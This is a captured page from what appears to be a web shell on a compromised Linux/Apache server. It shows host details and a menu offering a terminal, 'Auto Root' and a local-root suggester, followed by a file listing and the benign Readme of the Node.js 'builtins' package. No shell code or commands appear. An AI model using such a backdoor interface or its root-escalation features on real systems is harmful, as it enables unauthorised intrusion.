Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
node-builtins /
Delete
Unzip
Name
Size
Permission
Date
Action
Readme.md
772
B
-rw-r--r--
2022-04-20 08:30
changelog.Debian.gz
868
B
-rw-r--r--
2022-04-25 16:13
copyright
1.41
KB
-rw-r--r--
2022-04-25 16:10
Save
Rename
# builtins [](https://github.com/juliangruber/builtins/actions/workflows/ci.yml) List of node.js [builtin modules](http://nodejs.org/api/). ## Usage ```js const builtins = require('builtins') ``` Get list of core modules for current Node.js version: ```js assert(builtins().includes('http')) ``` Get list of core modules for specific Node.js version: ```js assert(builtins({ version: '6.0.0' }).includes('http')) ``` Get list of core modules present in one or mode Node.js versions: ```js assert(builtins({ version: '*' }).includes('worker_threads')) ``` Add experimental modules to the list: ```js assert(builtins({ experimental: true }).includes('wasi')) ``` ## License MIT